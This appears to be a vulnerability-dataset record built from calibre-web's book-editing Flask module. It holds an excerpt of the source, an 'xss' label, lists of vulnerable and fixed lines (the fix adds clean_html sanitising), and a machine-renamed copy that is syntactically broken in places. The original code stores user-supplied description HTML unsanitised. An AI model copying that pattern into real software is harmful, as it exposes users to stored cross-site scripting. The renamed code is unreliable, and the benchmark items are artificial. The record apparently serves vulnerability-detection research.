if file_ext not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
flash(_("File extension '%(ext)s' is not allowed to be uploaded to this server", ext=file_ext),
category="error")
return redirect(url_for('web.show_book', book_id=book.id))
else:
flash(_('File to be uploaded must have an extension'), category="error")
return redirect(url_for('web.show_book', book_id=book.id))
file_name = book.path.rsplit('/', 1)[-1]
filepath = os.path.normpath(os.path.join(config.config_calibre_dir, book.path))
saved_filename = os.path.join(filepath, file_name + '.' + file_ext)
# check if file path exists, otherwise create it, copy file to calibre path and delete temp file
if not os.path.exists(filepath):
try:
os.makedirs(filepath)
except OSError:
flash(_(u"Failed to create path %(path)s (Permission denied).", path=filepath), category="error")
return redirect(url_for('web.show_book', book_id=book.id))
try:
requested_file.save(saved_filename)
except OSError:
flash(_(u"Failed to store file %(file)s.", file=saved_filename), category="error")
return redirect(url_for('web.show_book', book_id=book.id))
file_size = os.path.getsize(saved_filename)
is_format = calibre_db.get_book_format(book_id, file_ext.upper())
# Format entry already exists, no need to update the database
if is_format:
log.warning('Book format %s already existing', file_ext.upper())
else:
try:
db_format = db.Data(book_id, file_ext.upper(), file_size, file_name)
calibre_db.session.add(db_format)
calibre_db.session.commit()
calibre_db.update_title_sort(config)
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
log.error('Database error: %s', e)
flash(_(u"Database error: %(error)s.", error=e), category="error")
return redirect(url_for('web.show_book', book_id=book.id))
# Queue uploader info
uploadText=_(u"File format %(ext)s added to %(book)s", ext=file_ext.upper(), book=book.title)
WorkerThread.add(current_user.name, TaskUpload(
"<a href=\"" + url_for('web.show_book', book_id=book.id) + "\">" + uploadText + "</a>"))
return uploader.process(
saved_filename, *os.path.splitext(requested_file.filename),
rarExecutable=config.config_rarfile_location)
def upload_cover(request, book):
if 'btn-upload-cover' in request.files:
requested_file = request.files['btn-upload-cover']
# check for empty request
if requested_file.filename != '':
if not current_user.role_upload():
abort(403)
ret, message = helper.save_cover(requested_file, book.path)
if ret is True:
return True
else:
flash(message, category="error")
return False
return None
def handle_title_on_edit(book, book_title):
# handle book title
book_title = book_title.rstrip().strip()
if book.title != book_title:
if book_title == '':
book_title = _(u'Unknown')
book.title = book_title
return True
return False
def handle_author_on_edit(book, author_name, update_stored=True):
# handle author(s)
input_authors = author_name.split('&')
input_authors = list(map(lambda it: it.strip().replace(',', '|'), input_authors))
# Remove duplicates in authors list
input_authors = helper.uniq(input_authors)
# we have all author names now
if input_authors == ['']:
input_authors = [_(u'Unknown')] # prevent empty Author
change = modify_database_object(input_authors, book.authors, db.Authors, calibre_db.session, 'author')
# Search for each author if author is in database, if not, author name and sorted author name is generated new
# everything then is assembled for sorted author field in database
sort_authors_list = list()
for inp in input_authors:
stored_author = calibre_db.session.query(db.Authors).filter(db.Authors.name == inp).first()
if not stored_author:
stored_author = helper.get_sorted_author(inp)
else:
stored_author = stored_author.sort
sort_authors_list.append(helper.get_sorted_author(stored_author))
sort_authors = ' & '.join(sort_authors_list)
if book.author_sort != sort_authors and update_stored:
book.author_sort = sort_authors
change = True
return input_authors, change
@editbook.route("/admin/book/<int:book_id>", methods=['GET', 'POST'])
@login_required_if_no_ano
@edit_required
def edit_book(book_id):
modif_date = False
# create the function for sorting...
try:
calibre_db.update_title_sort(config)
except sqliteOperationalError as e:
log.debug_or_exception(e)
calibre_db.session.rollback()
# Show form
if request.method != 'POST':
return render_edit_book(book_id)
book = calibre_db.get_filtered_book(book_id, allow_show_archived=True)
# Book not found
if not book:
flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
return redirect(url_for("web.index"))
meta = upload_single_file(request, book, book_id)
if upload_cover(request, book) is True:
book.has_cover = 1
modif_date = True
try:
to_save = request.form.to_dict()
merge_metadata(to_save, meta)
# Update book
edited_books_id = None
# handle book title
title_change = handle_title_on_edit(book, to_save["book_title"])
input_authors, authorchange = handle_author_on_edit(book, to_save["author_name"])
if authorchange or title_change:
edited_books_id = book.id
modif_date = True
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
error = False
if edited_books_id:
error = helper.update_dir_stucture(edited_books_id, config.config_calibre_dir, input_authors[0])
if not error:
if "cover_url" in to_save:
if to_save["cover_url"]:
if not current_user.role_upload():
return "", (403)
if to_save["cover_url"].endswith('/static/generic_cover.jpg'):
book.has_cover = 0
else:
result, error = helper.save_cover_from_url(to_save["cover_url"], book.path)
if result is True:
book.has_cover = 1
modif_date = True
else:
flash(error, category="error")
# Add default series_index to book
modif_date |= edit_book_series_index(to_save["series_index"], book)
# Handle book comments/description
modif_date |= edit_book_comments(Markup(to_save['description']).unescape(), book)
# Handle identifiers
input_identifiers = identifier_list(to_save, book)
modification, warning = modify_identifiers(input_identifiers, book.identifiers, calibre_db.session)
if warning:
flash(_("Identifiers are not Case Sensitive, Overwriting Old Identifier"), category="warning")
modif_date |= modification
# Handle book tags
modif_date |= edit_book_tags(to_save['tags'], book)
# Handle book series
modif_date |= edit_book_series(to_save["series"], book)
# handle book publisher
modif_date |= edit_book_publisher(to_save['publisher'], book)
# handle book languages
modif_date |= edit_book_languages(to_save['languages'], book)
# handle book ratings
modif_date |= edit_book_ratings(to_save, book)
# handle cc data
modif_date |= edit_cc_data(book_id, book, to_save)
if to_save["pubdate"]:
try:
book.pubdate = datetime.strptime(to_save["pubdate"], "%Y-%m-%d")
except ValueError:
book.pubdate = db.Books.DEFAULT_PUBDATE
else:
book.pubdate = db.Books.DEFAULT_PUBDATE
if modif_date:
book.last_modified = datetime.utcnow()
calibre_db.session.merge(book)
calibre_db.session.commit()
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
if "detail_view" in to_save:
return redirect(url_for('web.show_book', book_id=book.id))
else:
flash(_("Metadata successfully updated"), category="success")
return render_edit_book(book_id)
else:
calibre_db.session.rollback()
flash(error, category="error")
return render_edit_book(book_id)
except Exception as ex:
log.debug_or_exception(ex)
calibre_db.session.rollback()
flash(_("Error editing book, please check logfile for details"), category="error")
return redirect(url_for('web.show_book', book_id=book.id))
def merge_metadata(to_save, meta):
if to_save['author_name'] == _(u'Unknown'):
to_save['author_name'] = ''
if to_save['book_title'] == _(u'Unknown'):
to_save['book_title'] = ''
for s_field, m_field in [
('tags', 'tags'), ('author_name', 'author'), ('series', 'series'),
('series_index', 'series_id'), ('languages', 'languages'),
('book_title', 'title')]:
to_save[s_field] = to_save[s_field] or getattr(meta, m_field, '')
to_save["description"] = to_save["description"] or Markup(
getattr(meta, 'description', '')).unescape()
def identifier_list(to_save, book):
"""Generate a list of Identifiers from form information"""
id_type_prefix = 'identifier-type-'
id_val_prefix = 'identifier-val-'
result = []
for type_key, type_value in to_save.items():
if not type_key.startswith(id_type_prefix):
continue
val_key = id_val_prefix + type_key[len(id_type_prefix):]
if val_key not in to_save.keys():
continue
result.append(db.Identifiers(to_save[val_key], type_value, book.id))
return result
def prepare_authors_on_upload(title, authr):
if title != _(u'Unknown') and authr != _(u'Unknown'):
entry = calibre_db.check_exists_book(authr, title)
if entry:
log.info("Uploaded book probably exists in library")
flash(_(u"Uploaded book probably exists in the library, consider to change before upload new: ")
+ Markup(render_title_template('book_exists_flash.html', entry=entry)), category="warning")
# handle authors
input_authors = authr.split('&')
# handle_authors(input_authors)
input_authors = list(map(lambda it: it.strip().replace(',', '|'), input_authors))
# Remove duplicates in authors list
input_authors = helper.uniq(input_authors)
# we have all author names now
if input_authors == ['']:
input_authors = [_(u'Unknown')] # prevent empty Author
sort_authors_list = list()
db_author = None
for inp in input_authors:
stored_author = calibre_db.session.query(db.Authors).filter(db.Authors.name == inp).first()
if not stored_author:
if not db_author:
db_author = db.Authors(inp, helper.get_sorted_author(inp), "")
calibre_db.session.add(db_author)
calibre_db.session.commit()
sort_author = helper.get_sorted_author(inp)
else:
if not db_author:
db_author = stored_author
sort_author = stored_author.sort
sort_authors_list.append(sort_author)
sort_authors = ' & '.join(sort_authors_list)
return sort_authors, input_authors, db_author
def create_book_on_upload(modif_date, meta):
title = meta.title
authr = meta.author
sort_authors, input_authors, db_author = prepare_authors_on_upload(title, authr)
title_dir = helper.get_valid_filename(title)
author_dir = helper.get_valid_filename(db_author.name)
# combine path and normalize path from windows systems
path = os.path.join(author_dir, title_dir).replace('\\', '/')
# Calibre adds books with utc as timezone
db_book = db.Books(title, "", sort_authors, datetime.utcnow(), datetime(101, 1, 1),
'1', datetime.utcnow(), path, meta.cover, db_author, [], "")
modif_date |= modify_database_object(input_authors, db_book.authors, db.Authors, calibre_db.session,
'author')
# Add series_index to book
modif_date |= edit_book_series_index(meta.series_id, db_book)
# add languages
modif_date |= edit_book_languages(meta.languages, db_book, upload=True)
# handle tags
modif_date |= edit_book_tags(meta.tags, db_book)
# handle publisher
modif_date |= edit_book_publisher(meta.publisher, db_book)
# handle series
modif_date |= edit_book_series(meta.series, db_book)
# Add file to book
file_size = os.path.getsize(meta.file_path)
db_data = db.Data(db_book, meta.extension.upper()[1:], file_size, title_dir)
db_book.data.append(db_data)
calibre_db.session.add(db_book)
# flush content, get db_book.id available
calibre_db.session.flush()
return db_book, input_authors, title_dir
def file_handling_on_upload(requested_file):
# check if file extension is correct
if '.' in requested_file.filename:
file_ext = requested_file.filename.rsplit('.', 1)[-1].lower()
if file_ext not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
flash(
_("File extension '%(ext)s' is not allowed to be uploaded to this server",
ext=file_ext), category="error")
return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
else:
flash(_('File to be uploaded must have an extension'), category="error")
return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
# extract metadata from file
try:
meta = uploader.upload(requested_file, config.config_rarfile_location)
except (IOError, OSError):
log.error("File %s could not saved to temp dir", requested_file.filename)
flash(_(u"File %(filename)s could not saved to temp dir",
filename=requested_file.filename), category="error")
return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
return meta, None
def move_coverfile(meta, db_book):
# move cover to final directory, including book id
if meta.cover:
coverfile = meta.cover
else:
coverfile = os.path.join(constants.STATIC_DIR, 'generic_cover.jpg')
new_coverpath = os.path.join(config.config_calibre_dir, db_book.path, "cover.jpg")
try:
copyfile(coverfile, new_coverpath)
if meta.cover:
os.unlink(meta.cover)
except OSError as e:
log.error("Failed to move cover file %s: %s", new_coverpath, e)
flash(_(u"Failed to Move Cover File %(file)s: %(error)s", file=new_coverpath,
error=e),
category="error")
@editbook.route("/upload", methods=["GET", "POST"])
@login_required_if_no_ano
@upload_required
def upload():
if not config.config_uploading:
abort(404)
if request.method == 'POST' and 'btn-upload' in request.files:
for requested_file in request.files.getlist("btn-upload"):
try:
modif_date = False
# create the function for sorting...
calibre_db.update_title_sort(config)
calibre_db.session.connection().connection.connection.create_function('uuid4', 0, lambda: str(uuid4()))
meta, error = file_handling_on_upload(requested_file)
if error:
return error
db_book, input_authors, title_dir = create_book_on_upload(modif_date, meta)
# Comments needs book id therefore only possible after flush
modif_date |= edit_book_comments(Markup(meta.description).unescape(), db_book)
book_id = db_book.id
title = db_book.title
error = helper.update_dir_structure_file(book_id,
config.config_calibre_dir,
input_authors[0],
meta.file_path,
title_dir + meta.extension.lower())
move_coverfile(meta, db_book)
# save data to database, reread data
calibre_db.session.commit()
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
if error:
flash(error, category="error")
uploadText=_(u"File %(file)s uploaded", file=title)
WorkerThread.add(current_user.name, TaskUpload(
"<a href=\"" + url_for('web.show_book', book_id=book_id) + "\">" + uploadText + "</a>"))
if len(request.files.getlist("btn-upload")) < 2:
if current_user.role_edit() or current_user.role_admin():
resp = {"location": url_for('editbook.edit_book', book_id=book_id)}
return Response(json.dumps(resp), mimetype='application/json')
else:
resp = {"location": url_for('web.show_book', book_id=book_id)}
return Response(json.dumps(resp), mimetype='application/json')
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
log.error("Database error: %s", e)
flash(_(u"Database error: %(error)s.", error=e), category="error")
return Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
@editbook.route("/admin/book/convert/<int:book_id>", methods=['POST'])
@login_required_if_no_ano
@edit_required
def convert_bookformat(book_id):
# check to see if we have form fields to work with - if not send user back
book_format_from = request.form.get('book_format_from', None)
book_format_to = request.form.get('book_format_to', None)
if (book_format_from is None) or (book_format_to is None):
flash(_(u"Source or destination format for conversion missing"), category="error")
return redirect(url_for('editbook.edit_book', book_id=book_id))
log.info('converting: book id: %s from: %s to: %s', book_id, book_format_from, book_format_to)
rtn = helper.convert_book_format(book_id, config.config_calibre_dir, book_format_from.upper(),
book_format_to.upper(), current_user.name)
if rtn is None:
flash(_(u"Book successfully queued for converting to %(book_format)s",
book_format=book_format_to),
category="success")
else:
flash(_(u"There was an error converting this book: %(res)s", res=rtn), category="error")
return redirect(url_for('editbook.edit_book', book_id=book_id))
@editbook.route("/scholarsearch/<query>",methods=['GET'])
@login_required_if_no_ano
@edit_required
def scholar_search(query):
if have_scholar:
scholar_gen = scholarly.search_pubs(' '.join(query.split('+')))
i=0
result = []
for publication in scholar_gen:
del publication['source']
result.append(publication)
i+=1
if(i>=10):
break
return Response(json.dumps(result),mimetype='application/json')
else:
return "[]"
@editbook.route("/ajax/editbooks/<param>", methods=['POST'])
@login_required_if_no_ano
@edit_required
def edit_list_book(param):
vals = request.form.to_dict()
book = calibre_db.get_book(vals['pk'])
ret = ""
if param =='series_index':
edit_book_series_index(vals['value'], book)
ret = Response(json.dumps({'success': True, 'newValue': book.series_index}), mimetype='application/json')
elif param =='tags':
edit_book_tags(vals['value'], book)
ret = Response(json.dumps({'success': True, 'newValue': ', '.join([tag.name for tag in book.tags])}),
mimetype='application/json')
elif param =='series':
edit_book_series(vals['value'], book)
ret = Response(json.dumps({'success': True, 'newValue': ', '.join([serie.name for serie in book.series])}),
mimetype='application/json')
elif param =='publishers':
edit_book_publisher(vals['value'], book)
ret = Response(json.dumps({'success': True,
'newValue': ', '.join([publisher.name for publisher in book.publishers])}),
mimetype='application/json')
elif param =='languages':
invalid = list()
edit_book_languages(vals['value'], book, invalid=invalid)
if invalid:
ret = Response(json.dumps({'success': False,
'msg': 'Invalid languages in request: {}'.format(','.join(invalid))}),
mimetype='application/json')
else:
lang_names = list()
for lang in book.languages:
try:
lang_names.append(LC.parse(lang.lang_code).get_language_name(get_locale()))
except UnknownLocaleError:
lang_names.append(_(isoLanguages.get(part3=lang.lang_code).name))
ret = Response(json.dumps({'success': True, 'newValue': ', '.join(lang_names)}),
mimetype='application/json')
elif param =='author_sort':
book.author_sort = vals['value']
ret = Response(json.dumps({'success': True, 'newValue': book.author_sort}),
mimetype='application/json')
elif param == 'title':
sort = book.sort
handle_title_on_edit(book, vals.get('value', ""))
helper.update_dir_stucture(book.id, config.config_calibre_dir)
ret = Response(json.dumps({'success': True, 'newValue': book.title}),
mimetype='application/json')
elif param =='sort':
book.sort = vals['value']
ret = Response(json.dumps({'success': True, 'newValue': book.sort}),
mimetype='application/json')
elif param =='authors':
input_authors, __ = handle_author_on_edit(book, vals['value'], vals.get('checkA', None) == "true")
helper.update_dir_stucture(book.id, config.config_calibre_dir, input_authors[0])
ret = Response(json.dumps({'success': True,
'newValue': ' & '.join([author.replace('|',',') for author in input_authors])}),
mimetype='application/json')
book.last_modified = datetime.utcnow()
try:
calibre_db.session.commit()
# revert change for sort if automatic fields link is deactivated
if param == 'title' and vals.get('checkT') == "false":
book.sort = sort
calibre_db.session.commit()
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
log.error("Database error: %s", e)
return ret
@editbook.route("/ajax/sort_value/<field>/<int:bookid>")
@login_required
def get_sorted_entry(field, bookid):
if field in ['title', 'authors', 'sort', 'author_sort']:
book = calibre_db.get_filtered_book(bookid)
if book:
if field == 'title':
return json.dumps({'sort': book.sort})
elif field == 'authors':
return json.dumps({'author_sort': book.author_sort})
if field == 'sort':
return json.dumps({'sort': book.title})
if field == 'author_sort':
return json.dumps({'author_sort': book.author})
return ""
@editbook.route("/ajax/simulatemerge", methods=['POST'])
@login_required
@edit_required
def simulate_merge_list_book():
vals = request.get_json().get('Merge_books')
if vals:
to_book = calibre_db.get_book(vals[0]).title
vals.pop(0)
if to_book:
for book_id in vals:
from_book = []
from_book.append(calibre_db.get_book(book_id).title)
return json.dumps({'to': to_book, 'from': from_book})
return ""
@editbook.route("/ajax/mergebooks", methods=['POST'])
@login_required
@edit_required
def merge_list_book():
vals = request.get_json().get('Merge_books')
to_file = list()
if vals:
# load all formats from target book
to_book = calibre_db.get_book(vals[0])
vals.pop(0)
if to_book:
for file in to_book.data:
to_file.append(file.format)
to_name = helper.get_valid_filename(to_book.title) + ' - ' + \
helper.get_valid_filename(to_book.authors[0].name)
for book_id in vals:
from_book = calibre_db.get_book(book_id)
if from_book:
for element in from_book.data:
if element.format not in to_file:
# create new data entry with: book_id, book_format, uncompressed_size, name
filepath_new = os.path.normpath(os.path.join(config.config_calibre_dir,
to_book.path,
to_name + "." + element.format.lower()))
filepath_old = os.path.normpath(os.path.join(config.config_calibre_dir,
from_book.path,
element.name + "." + element.format.lower()))
copyfile(filepath_old, filepath_new)
to_book.data.append(db.Data(to_book.id,
element.format,
element.uncompressed_size,
to_name))
delete_book(from_book.id,"", True)
return json.dumps({'success': True})
return ""
@editbook.route("/ajax/xchange", methods=['POST'])
@login_required
@edit_required
def table_xchange_author_title():
vals = request.get_json().get('xchange')
if vals:
for val in vals:
modif_date = False
book = calibre_db.get_book(val)
authors = book.title
entries = calibre_db.order_authors(book)
author_names = []
for authr in entries.authors:
author_names.append(authr.name.replace('|', ','))
title_change = handle_title_on_edit(book, " ".join(author_names))
input_authors, authorchange = handle_author_on_edit(book, authors)
if authorchange or title_change:
edited_books_id = book.id
modif_date = True
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
if edited_books_id:
helper.update_dir_stucture(edited_books_id, config.config_calibre_dir, input_authors[0])
if modif_date:
book.last_modified = datetime.utcnow()
try:
calibre_db.session.commit()
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
log.error("Database error: %s", e)
return json.dumps({'success': False})
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
return json.dumps({'success': True})
return ""
| xss | {
"code": [
"have_scholar = True",
" pass",
" book.comments[0].text = comments"
],
"line_no": [
31,
36,
464
]
} | {
"code": [
" have_scholar = True",
" if comments:",
" comments = clean_html(comments)",
" book.comments[0].text = clean_html(comments)",
" if to_save[cc_string]:",
" to_save[cc_string] = clean_html(to_save[cc_string])"
],
"line_no": [
34,
463,
464,
467,
521,
522
]
} |
from __future__ import division, print_function, unicode_literals
import os
from datetime import datetime
import json
from shutil import .copyfile
from uuid import uuid4
VAR_0 = True
try:
from scholarly import scholarly
except ImportError:
VAR_0 = False
pass
from babel import Locale as LC
from babel.core import UnknownLocaleError
from flask import Blueprint, VAR_32, flash, redirect, url_for, abort, Markup, Response
from flask_babel import gettext as _
from flask_login import .current_user, login_required
from sqlalchemy.exc import OperationalError, IntegrityError
from sqlite3 import OperationalError as sqliteOperationalError
from . import .constants, logger, isoLanguages, gdriveutils, uploader, helper
from . import .config, get_locale, ub, db
from . import .calibre_db
from .services.worker import WorkerThread
from .tasks.upload import TaskUpload
from .render_template import render_title_template
from .usermanagement import .login_required_if_no_ano
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
VAR_1 = Blueprint('editbook', __name__)
VAR_2 = logger.create()
def FUNC_0(VAR_3):
@wraps(VAR_3)
def FUNC_44(*VAR_46, **VAR_47):
if current_user.role_upload() or current_user.role_admin():
return VAR_3(*VAR_46, **VAR_47)
abort(403)
return FUNC_44
def FUNC_1(VAR_3):
@wraps(VAR_3)
def FUNC_44(*VAR_46, **VAR_47):
if current_user.role_edit() or current_user.role_admin():
return VAR_3(*VAR_46, **VAR_47)
abort(403)
return FUNC_44
def FUNC_2(VAR_4, VAR_5, VAR_6):
VAR_8 = []
for c_elements in VAR_4:
VAR_82 = False
if VAR_5 == 'languages':
VAR_101 = c_elements.lang_code
elif VAR_5 == 'custom':
VAR_101 = c_elements.value
else:
VAR_101 = c_elements.name
for inp_element in VAR_6:
if inp_element.lower() == VAR_101.lower():
VAR_82 = True
break
if not VAR_82:
VAR_8.append(c_elements)
return VAR_8
def FUNC_3(VAR_4, VAR_5, VAR_6):
VAR_10 = []
for inp_element in VAR_6:
VAR_82 = False
for c_elements in VAR_4:
if VAR_5 == 'languages':
VAR_101 = c_elements.lang_code
elif VAR_5 == 'custom':
VAR_101 = c_elements.value
else:
VAR_101 = c_elements.name
if inp_element == VAR_101:
VAR_82 = True
break
if not VAR_82:
VAR_10.append(inp_element)
return VAR_10
def FUNC_4(VAR_4, VAR_7, VAR_8):
VAR_48 = False
if len(VAR_8) > 0:
for del_element in VAR_8:
VAR_4.remove(del_element)
VAR_48 = True
if len(del_element.books) == 0:
VAR_7.delete(del_element)
return VAR_48
def FUNC_5(VAR_4, VAR_9, VAR_7, VAR_5, VAR_10):
VAR_48 = False
if VAR_5 == 'languages':
VAR_83 = VAR_9.lang_code
elif VAR_5 == 'custom':
VAR_83 = VAR_9.value
else:
VAR_83 = VAR_9.name
for VAR_12 in VAR_10:
VAR_11 = VAR_7.query(VAR_9).filter(VAR_83 == VAR_12).first()
if VAR_5 == 'author':
VAR_102 = VAR_9(VAR_12, helper.get_sorted_author(VAR_12.replace('|', ',')), "")
elif VAR_5 == 'series':
VAR_102 = VAR_9(VAR_12, add_element)
elif VAR_5 == 'custom':
VAR_102 = VAR_9(value=VAR_12)
elif VAR_5 == 'publisher':
VAR_102 = VAR_9(VAR_12, None)
else: # VAR_5 should be tag or language
VAR_102 = VAR_9(VAR_12)
if VAR_11 is None:
VAR_48 = True
VAR_7.add(VAR_102)
VAR_4.append(VAR_102)
else:
VAR_11 = FUNC_6(VAR_11, VAR_12, VAR_5)
VAR_48 = True
VAR_48 = True
VAR_4.append(VAR_11)
return VAR_48
def FUNC_6(VAR_11, VAR_12, VAR_5):
if VAR_5 == 'custom':
if VAR_11.value != VAR_12:
VAR_11.value = VAR_12 # ToDo: Before VAR_102, but this is not plausible
elif VAR_5 == 'languages':
if VAR_11.lang_code != VAR_12:
VAR_11.lang_code = VAR_12
elif VAR_5 == 'series':
if VAR_11.name != VAR_12:
VAR_11.name = VAR_12
VAR_11.sort = VAR_12
elif VAR_5 == 'author':
if VAR_11.name != VAR_12:
VAR_11.name = VAR_12
VAR_11.sort = VAR_12.replace('|', ',')
elif VAR_5 == 'publisher':
if VAR_11.name != VAR_12:
VAR_11.name = VAR_12
VAR_11.sort = None
elif VAR_11.name != VAR_12:
VAR_11.name = VAR_12
return VAR_11
def FUNC_7(VAR_6, VAR_4, VAR_9, VAR_7, VAR_5):
if not isinstance(VAR_6, list):
raise TypeError(str(VAR_6) + " should be passed as a list")
VAR_6 = [x for x in VAR_6 if x != '']
VAR_8 = FUNC_2(VAR_4, VAR_5, VAR_6)
VAR_10 = FUNC_3(VAR_4, VAR_5, VAR_6)
VAR_48 = FUNC_4(VAR_4, VAR_7, VAR_8)
if len(VAR_10) > 0:
VAR_48 |= FUNC_5(VAR_4, VAR_9, VAR_7, VAR_5, VAR_10)
return VAR_48
def FUNC_8(VAR_13, VAR_14, VAR_7):
VAR_48 = False
VAR_49 = False
VAR_50 = dict([(identifier.type.lower(), identifier) for identifier in VAR_13])
if len(VAR_13) != len(VAR_50):
VAR_49 = True
VAR_51 = dict([(identifier.type.lower(), identifier) for identifier in VAR_14 ])
for identifier_type, identifier in VAR_51.items():
if identifier_type not in VAR_50.keys():
VAR_7.delete(identifier)
VAR_48 = True
else:
VAR_103 = VAR_50[identifier_type]
identifier.type = VAR_103.type
identifier.val = VAR_103.val
for identifier_type, identifier in VAR_50.items():
if identifier_type not in VAR_51.keys():
VAR_7.add(identifier)
VAR_48 = True
return VAR_48, VAR_49
@VAR_1.route("/ajax/delete/<int:VAR_15>")
@login_required
def FUNC_9(VAR_15):
return Response(FUNC_13(VAR_15, "", True), mimetype='application/json')
@VAR_1.route("/delete/<int:VAR_15>", defaults={'book_format': ""})
@VAR_1.route("/delete/<int:VAR_15>/<string:VAR_16>")
@login_required
def FUNC_10(VAR_15, VAR_16):
return FUNC_13(VAR_15, VAR_16, False)
def FUNC_11(VAR_15, VAR_17):
ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == VAR_15).delete()
ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == VAR_15).delete()
ub.delete_download(VAR_15)
ub.session_commit()
FUNC_7([u''], VAR_17.authors, db.Authors, calibre_db.session, 'author')
FUNC_7([u''], VAR_17.tags, db.Tags, calibre_db.session, 'tags')
FUNC_7([u''], VAR_17.series, db.Series, calibre_db.session, 'series')
FUNC_7([u''], VAR_17.languages, db.Languages, calibre_db.session, 'languages')
FUNC_7([u''], VAR_17.publishers, db.Publishers, calibre_db.session, 'publishers')
VAR_52 = calibre_db.session.query(db.Custom_Columns). \
filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
for VAR_29 in VAR_52:
VAR_31 = "custom_column_" + str(VAR_29.id)
if not VAR_29.is_multiple:
if len(getattr(VAR_17, VAR_31)) > 0:
if VAR_29.datatype == 'bool' or VAR_29.datatype == 'integer' or VAR_29.datatype == 'float':
VAR_105 = getattr(VAR_17, VAR_31)[0]
getattr(VAR_17, VAR_31).remove(VAR_105)
VAR_2.debug('remove ' + str(VAR_29.id))
calibre_db.session.delete(VAR_105)
calibre_db.session.commit()
elif VAR_29.datatype == 'rating':
VAR_105 = getattr(VAR_17, VAR_31)[0]
getattr(VAR_17, VAR_31).remove(VAR_105)
if len(VAR_105.books) == 0:
VAR_2.debug('remove ' + str(VAR_29.id))
calibre_db.session.delete(VAR_105)
calibre_db.session.commit()
else:
VAR_105 = getattr(VAR_17, VAR_31)[0]
getattr(VAR_17, VAR_31).remove(VAR_105)
VAR_2.debug('remove ' + str(VAR_29.id))
calibre_db.session.delete(VAR_105)
calibre_db.session.commit()
else:
FUNC_7([u''], getattr(VAR_17, VAR_31), db.cc_classes[VAR_29.id],
calibre_db.session, 'custom')
calibre_db.session.query(db.Books).filter(db.Books.id == VAR_15).delete()
def FUNC_12(VAR_16, VAR_18, VAR_19, VAR_15):
if VAR_16:
if VAR_18:
return json.dumps([VAR_19, {"location": url_for("editbook.edit_book", VAR_15=book_id),
"type": "success",
"format": VAR_16,
"message": _('Book Format Successfully Deleted')}])
else:
flash(_('Book Format Successfully Deleted'), category="success")
return redirect(url_for('editbook.edit_book', VAR_15=book_id))
else:
if VAR_18:
return json.dumps([VAR_19, {"location": url_for('web.index'),
"type": "success",
"format": VAR_16,
"message": _('Book Successfully Deleted')}])
else:
flash(_('Book Successfully Deleted'), category="success")
return redirect(url_for('web.index'))
def FUNC_13(VAR_15, VAR_16, VAR_18):
VAR_19 = {}
if current_user.role_delete_books():
VAR_17 = calibre_db.get_book(VAR_15)
if VAR_17:
try:
VAR_68, VAR_49 = helper.delete_book(VAR_17, config.config_calibre_dir, VAR_16=book_format.upper())
if not VAR_68:
if VAR_18:
return json.dumps([{"location": url_for("editbook.edit_book", VAR_15=book_id),
"type": "danger",
"format": "",
"message": VAR_49}])
else:
flash(VAR_49, category="error")
return redirect(url_for('editbook.edit_book', VAR_15=book_id))
if VAR_49:
if VAR_18:
VAR_19 = {"location": url_for("editbook.edit_book", VAR_15=book_id),
"type": "warning",
"format": "",
"message": VAR_49}
else:
flash(VAR_49, category="warning")
if not VAR_16:
FUNC_11(VAR_15, VAR_17)
else:
calibre_db.session.query(db.Data).filter(db.Data.book == VAR_17.id).\
filter(db.Data.format == VAR_16).delete()
calibre_db.session.commit()
except Exception as ex:
VAR_2.debug_or_exception(ex)
calibre_db.session.rollback()
if VAR_18:
return json.dumps([{"location": url_for("editbook.edit_book", VAR_15=book_id),
"type": "danger",
"format": "",
"message": ex}])
else:
flash(str(ex), category="error")
return redirect(url_for('editbook.edit_book', VAR_15=book_id))
else:
VAR_2.error('Book with id "%s" could not be deleted: not found', VAR_15)
return FUNC_12(VAR_16, VAR_18, VAR_19, VAR_15)
def FUNC_14(VAR_15):
VAR_52 = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
VAR_17 = calibre_db.get_filtered_book(VAR_15, allow_show_archived=True)
if not VAR_17:
flash(_(u"Oops! Selected VAR_17 VAR_37 is unavailable. File does not exist or is not accessible"), category="error")
return redirect(url_for("web.index"))
for lang in VAR_17.languages:
lang.language_name = isoLanguages.get_language_name(get_locale(), lang.lang_code)
VAR_17 = calibre_db.order_authors(VAR_17)
VAR_53 = []
for VAR_38 in VAR_17.authors:
VAR_53.append(VAR_38.name.replace('|', ','))
VAR_54=list()
VAR_55 = list()
VAR_56=None
if config.config_converterpath:
for file in VAR_17.data:
if file.format.lower() in constants.EXTENSIONS_CONVERT_FROM:
VAR_54.append(file.format.lower())
if config.config_kepubifypath and 'epub' in [file.format.lower() for file in VAR_17.data]:
VAR_56 = True
if not config.config_converterpath:
VAR_54.append('epub')
if config.config_converterpath:
VAR_55 = constants.EXTENSIONS_CONVERT_TO[:]
for file in VAR_17.data:
if file.format.lower() in VAR_55:
allowed_conversion_formats.remove(file.format.lower())
if VAR_56:
VAR_55.append('kepub')
return render_title_template('book_edit.html', VAR_17=book, VAR_115=VAR_53, VAR_52=cc,
VAR_37=_(u"edit metadata"), page="editbook",
conversion_formats=VAR_55,
config=config,
source_formats=VAR_54)
def FUNC_15(VAR_20, VAR_17):
VAR_48 = False
if VAR_20["rating"].strip():
VAR_84 = False
if len(VAR_17.ratings) > 0:
